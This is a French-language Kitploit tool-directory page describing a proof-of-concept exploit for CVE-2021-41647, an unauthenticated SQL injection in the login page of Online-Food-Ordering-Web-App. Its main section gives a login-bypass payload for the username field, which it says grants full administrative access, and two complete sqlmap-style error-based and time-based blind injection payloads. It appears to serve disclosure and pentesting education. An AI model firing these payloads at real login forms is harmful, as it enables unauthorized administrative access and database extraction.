Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41647 — Exploit de preuve de concept pour l'injection SQL non authentifiée dans Online-Food-Ordering-Web-App, démontrant le contournement de connexion et les techniques d'injection aveugle basée sur le temps et les erreurs. | Kitploit
Outils/GitHubGitHub/mobiusbinary/cve-2021-41647
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubmobiusbinary/cve-2021-41647

CVE-2021-41647

Exploit de preuve de concept pour l'injection SQL non authentifiée dans Online-Food-Ordering-Web-App, démontrant le contournement de connexion et les techniques d'injection aveugle basée sur le temps et les erreurs.

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-41647

CVE-2021-41647 SQL Injection dans Online-Food-Ordering-Web-App

L'application Online-Food-Ordering-Web-App est vulnérable à des attaques par injection SQL non authentifiées de type error-based et time-based blind.
Le paramètre username sur la page /login.php ne nettoie pas l'entrée utilisateur, un attaquant peut contourner la connexion en utilisant une simple technique de contournement.

Lien vers l'application

Online-Food-Ordering-Web-App

Composants et paramètres affectés

URL: /login.php
PARAMÈTRE: username

Preuves de concept

LOGIN BYPASS PAYLOAD

Pour contourner la connexion utilisateur et obtenir un accès administratif complet, utilisez la charge utile dans le champ username : user' or 1=1-- -

SQLMAP PAYLOADS

Paramètre: username (POST Request) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Si l'image de la POC n'est pas claire, veuillez cliquer sur le GIF qui se chargera dans une meilleure résolution.

POC

Découvert par

Jason Colyvas
MOBIUSBINARY
20 septembre 2021

Télécharger l’outil